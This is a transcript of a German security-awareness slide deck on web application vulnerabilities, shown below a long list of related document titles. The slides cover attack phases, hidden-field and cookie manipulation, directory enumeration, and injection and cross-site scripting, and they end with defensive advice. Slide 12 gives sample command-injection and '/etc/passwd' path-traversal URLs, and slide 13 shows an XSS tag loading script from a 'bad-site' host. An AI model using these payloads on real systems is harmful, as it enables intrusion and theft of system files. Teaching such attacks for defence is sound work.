Web Applications Vulnerabilities



Ähnliche Dokumente
Schwachstellenanalyse 2012

Lokale Installation von DotNetNuke 4 ohne IIS

Datenbank-Verschlüsselung mit DbDefence und Webanwendungen.

OP-LOG

Internet Explorer Version 6

pro4controlling - Whitepaper [DEU] Whitepaper zur CfMD-Lösung pro4controlling Seite 1 von 9

TimeMachine. Time CGI. Version 1.5. Stand Dokument: time.odt. Berger EDV Service Tulbeckstr München

FIREBIRD BETRIEB DER SAFESCAN TA UND TA+ SOFTWARE AUF MEHR ALS EINEM COMPUTER

How-to: Webserver NAT. Securepoint Security System Version 2007nx

Sicherheit in Webanwendungen CrossSite, Session und SQL

5. Testen ob TLS 1.0 auf Ihrem System im Internet-Explorer fehlerfrei funktioniert

Einrichtung Secure-FTP

Wo finde ich die Software? - Jedem ProLiant Server liegt eine Management CD bei. - Über die Internetseite

Compass E-Lab Remote Security Lab 19. November Hacking-Lab Glärnischstrasse 7 Postfach 1671 CH-8640 Rapperswil

Installationsanleitung dateiagent Pro

Wiederherstellen der Beispieldatenbanken zum Buch Microsoft Project 2010

DELFI. Benutzeranleitung Dateiversand für unsere Kunden. Grontmij GmbH. Postfach Bremen. Friedrich-Mißler-Straße Bremen

Installation von NetBeans inkl. Glassfish Anwendungs-Server

Information zum SQL Server: Installieren und deinstallieren. (Stand: September 2012)

Verwendung des Terminalservers der MUG

Formular»Fragenkatalog BIM-Server«

Step by Step Webserver unter Windows Server von Christian Bartl

mysoftfolio360 Handbuch

NTR-Support Die neue Fernwartung

Kombinierte Attacke auf Mobile Geräte

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity

Erstellen einer in OWA (Outlook Web App)

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Step by Step Softwareverteilung unter Novell. von Christian Bartl

ICS-Addin. Benutzerhandbuch. Version: 1.0

BitDefender Client Security Kurzanleitung

Albert HAYR Linux, IT and Open Source Expert and Solution Architect. Open Source professionell einsetzen

SharePoint Demonstration

Einrichten des IIS für VDF WebApp. Einrichten des IIS (Internet Information Server) zur Verwendung von Visual DataFlex Web Applications

FTP-Leitfaden RZ. Benutzerleitfaden

Hinweise zur Verwendung von myfactory unter Windows XP mit Service Pack 2

Einrichten eines Postfachs mit Outlook Express / Outlook bis Version 2000

Popup Blocker/Sicherheitseinstellungen

Herzlich willkommen im Modul Web-Engineering

Was ist PDF? Portable Document Format, von Adobe Systems entwickelt Multiplattformfähigkeit,

Facebook I-Frame Tabs mit Papoo Plugin erstellen und verwalten

ÖVSV Mitglieder-Datenbank. Benutzerhandbuch Version 1.2.1

Kommunikationsübersicht XIMA FORMCYCLE Inhaltsverzeichnis

So funktioniert die NetWorker 7.5 Eigenschaft zum Sichern umbenannter Verzeichnisse ( Backup renamed Directories )

Zugriff auf OWA Auf OWA kann über folgende URLs zugegriffen werden:

Anwenderleitfaden Citrix. Stand Februar 2008

OS IDE Webserver Integration des Webservers in die IDE Wireshark Webserver II Dynamisches Webprojekt in Eclipse

Rechnernetze Praktikum Versuch 8: Zertifikate, Sicherheit in öffentlichen Netzen

Verwendung des IDS Backup Systems unter Windows 2000

1. Zugriff auf das Lonza Netzwerk von ihrem privaten PC oder von einem Internet Café

Internet online Update (Internet Explorer)

Daten Sichern mit dem QNAP NetBak Replicator 4.0

Beschreibung Installation SSH Server für sicher Verbindung oder Bedienung via Proxyserver. (Version 5.x)

Memeo Instant Backup Kurzleitfaden. Schritt 1: Richten Sie Ihr kostenloses Memeo-Konto ein

Advoware mit VPN Zugriff lokaler Server / PC auf externe Datenbank

Internet online Update (Mozilla Firefox)

Konfiguration von Igel ThinClients fu r den Zugriff via Netscaler Gateway auf eine Storefront/ XenDesktop 7 Umgebung

Protect 7 Anti-Malware Service. Dokumentation

Control-M Workload Change Management 8

Er musste so eingerichtet werden, dass das D-Laufwerk auf das E-Laufwerk gespiegelt

Anleitung OpenCms 8 Webformular Auswertung

Backup der Progress Datenbank

Verschlüsseln Sie Ihre Dateien lückenlos Verwenden Sie TrueCrypt, um Ihre Daten zu schützen.

Einführung in TexMaker

Kurzanleitung zur Softwareverteilung von BitDefender Produkten...2

Anti-Botnet-Beratungszentrum. Windows XP in fünf Schritten absichern

Die Statistiken von SiMedia

So die eigene WEB-Seite von Pinterest verifizieren lassen!

Penetrationtests: Praxisnahe IT-Sicherheit

Cookies & Browserverlauf löschen

PostFinance Modul. Installationsanleitung. Module version: 1.0 OXID versions: 4.6.x 4.8.x/5.1.x. Copyright Tarkka.ch /8

A. Ersetzung einer veralteten Govello-ID ( Absenderadresse )

AXIGEN Mail Server. s per Smarthost versenden s per Pop3 empfangen. Produkt Version: Dokument Version: 1.2

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein: - Ein Bootimage ab Version Optional einen DHCP Server.

Dieses Dokument soll dem Administrator helfen, die ENiQ-Software als Client auf dem Zielrechner zu installieren und zu konfigurieren.

Aktivierung und Update. Entry CE Client

Anleitung zur Konfiguration eines NO-IP DynDNS-Accounts mit der TOOLBOXflex-3.2

Übung - Datensicherung und Wiederherstellung in Windows 7

Online-News Ausgabe 12, Juli 2000 Seite 56

Norton Internet Security

Installationsanleitung Laurus Projekte System (Aufgaben / Projekte mit Gantt Chart)

Teamviewer - Bildschirmpräsentation via Internet

Anwendungsbeispiele. Neuerungen in den s. Webling ist ein Produkt der Firma:

Radius Online-Campus. PC-technische Voraussetzungen

EIDAMO Webshop-Lösung - White Paper

BEDIENUNG ABADISCOVER

ANYWHERE Zugriff von externen Arbeitsplätzen

ExpressShipper Registrations- und Installationsanleitung

Java Script für die Nutzung unseres Online-Bestellsystems

ecaros-update 8.2 Update 8.2 procar informatik AG 1 Stand: DP 02/2014 Eschenweg Weiterstadt

Diese Kurzanleitung beschreibt die nötigen Einstellungen, um mit pixafe Transfer Bilder auf einem Facebook Konto veröffentlichen zu können.

Erste Hilfe. «/IE Cache & Cookies» Logout, alte Seiten erscheinen, Erfasstes verschwindet?

Wählen Sie bitte START EINSTELLUNGEN SYSTEMSTEUERUNG VERWALTUNG und Sie erhalten unter Windows 2000 die folgende Darstellung:

Wie funktioniert das WWW? Sicher im WWW

Mobile Konsole von NetSupport DNA Erste Schritte. Copyright 2011 NetSupport Ltd alle Rechte vorbehalten

Benutzerhandbuch. Leitfaden zur Benutzung der Anwendung für sicheren Dateitransfer.

Konvertieren von Settingsdateien

Transkript:

Bull AG Wien Web Applications Vulnerabilities Philipp Schaumann Dipl. Physiker Bull AG, Wien www.bull.at/security

Die Problematik Folie 2 Der Webserver ist das Tor zum Internet auch ein Firewall schützt den Webserver nur bedingt, denn... Port 80 (443) und die DMZ müssen offen gehalten werden um ihre Funktion zu erfüllen Viele Angriffstool nützen diese Öffnung aus Web Anwendungen sind oft komplex und mehr oder weniger hand-gestrickt Web Developer haben wenig Wissen von den Angriffsmethoden Angreifer haben beliebig viel Zeit zum Finden von Schwachstellen Webserver sind oft Portal zu den Corporate Daten

Web Applications haben viele Formen Folie 3 Internet Shop E-Commerce Site Partner- und Kunden-Portale Statische Websites mit Feedback- Option

Traditionelle Schwachstellen Folie 4 Veraltete Versionen des Betriebssystems, des Webservers, Mailservers, des DNS (ungepatched) Unnötige Dienste in der DMZ aktiv (z.b. telnet von außen) Beispiel- und Testsoftware verbleibt im Produktionssystem Datenbanken in der gleichen DMZ wie der Webserver SQL port nach außen offen (SQL Slammer!!) Web Anwendung mit schwacher Authentisierung, auch für Administrativ-Funktionen Externe gehostete Webserver sind oft ganz ohne Firewall!

Angriffsszenario Folie 5 1. Port Scan (Suche nach offen Ports) 2. Information Gathering (welche Software wird genutzt, Analyse der Directory- Struktur, Suche nach Kommentaren im Code) 3. Testen der Web Anwendungen nach offensichtlichen Bugs 4. Planung des Angriffs auf Grund der gefundenen Informationen 5. Angriff

Die Tricks Folie 6 Ausnutzen der bekannten Schwachstellen der vorgefundenen Software Analyse der Seiten im Browser nach Hidden- Fields Manipulation der Hidden-Fields im Browser (Rücksendung durch telnet statt Browser) Analyse der Javascript-Funktionen zeigt das Ausmaß des Parameter-Checkings Benutzung von Seiten, in denen das Parameter-Checking abgestellt wurde

Die Tricks (2) Folie 7 Ausnutzen von bekannten Test-Files, die nach der Installation nicht entfernt wurden z.b. /cgi-bin/formmail.pl Durchprobieren von Namen wie /archive/ /old/ /alt/ /test/ /scripts/

Die Tricks (3) Folie 8 Java Applet Reengineering Java kann auf dem Client decompiliert werden und ist dann wieder im Quellcode lesbar Suche nach bekannten Files auf dem Webserver, z.b. ws_ftp.log, die immer an der gleichen Stelle zu finden sind

Parameter Truncation Folie 9 Systematisches Verkürzen des Pfades, z.b. http://domain.at/customer/id/993/details.htm http://domain.at/customer/id/993/ http://domain.at/customer/id/ http://domain.at/customer/ Directories ohne Default-HTM-Seite zeigen ihren kompletten Inhalt in roher Form an, auch die Inhalte, die nicht verlinkt sind

Directory Enumeration Folie 10 Suche nach Directories und Pfaden, auf die zwar nicht verlinkt wird, die jedoch trotzdem öffentlich zu erreichen sind. Dort stehen oft veraltete oder Testversionen. Google listet oft Pfade, auf die kein Link (mehr) zeigt.

Parameter Manipulation Folie 11 Eingabe von falschen Parametern in Fragebögen. Auswertung der Antworten zeigt, was der Programmierer abgeprüft hat Manche Programmierer setzen den Inhalt des Feldes direkt in System- oder SQL- Kommandos ein Betriebssystem-Kommandos hinter Trennzeichen ( oder ;) SQL-Injection - Einfügen von SQL Kommandos in Text-Eingabefelder SQL-Kommandos hinter Trennzeichen ( oder ;)

Parameter Passing Folie 12 http://domain.at/contact.asp?email=aaa@do main.at&subj=wie+geht+es Wird zu... /contact.asp?email=`&subj=... /contact.asp?email= ls&subj=... /contact.asp?email=/../../../etc/passwd&subj =/../../../etc/passwd

Cross-Site Scripting Folie 13 In Diskussionsgruppen, Guestbooks und Bulletin-Board können Anwender zum Teil Scripts in ihren eigenen Text einfügen Hello message board. This is a message. <SCRIPT SRC='http://bad-site/badfile'> malicious code</script> This is the end of my message. Beispiele: <SCRIPT>, <OBJECT>, <APPLET>, und <EMBED> http://www.cert.org/tech_tips/malicious_code_mitigation.html 1. Explicitly setting the character set encoding for each page generated by the web server 2. Identifying special characters 3. Encoding dynamic output elements 4. Filtering specific characters in dynamic elements 5. Examine cookies

Cookie Tampering Folie 14 Der Inhalt von Cookies kann geändert werden, um z.b. eine erfolgte Authentisierung vorzutäuschen in dem eine falsche Session ID eingesetzt wird

Cookies Folie 15 Kleine Dateien, die ein Webserver auf dem Client ablegen kann. Werden nur an die Domaine zurückübertragen, die den Cookie geschrieben hat Permanente Cookies (auf der Platte des PCs - SYSTEM/TEMPORARY INTERNET FILES) Session Cookies (im Speicher des Browsers, auch verschlüsselt) Cross Site Tracing Cookies (kommen mit Werbebannern oder -popups)

Cookies Folie 16 Problem: http ist ein state-less Protokoll, Cookies erzeugen state und erlauben Sessions Alternativlösung: Generierung von session-spezifischen URLs durch den Webserver

Web Application Testing Folie 17 Es gibt Tools zum systematischen Testen von Webanwendungen Diese sollten bereits in der Entwicklungs- und Testphase eingesetzt werden Regelmäßiger Neu-Einsatz wegen neuer Angriffsmethoden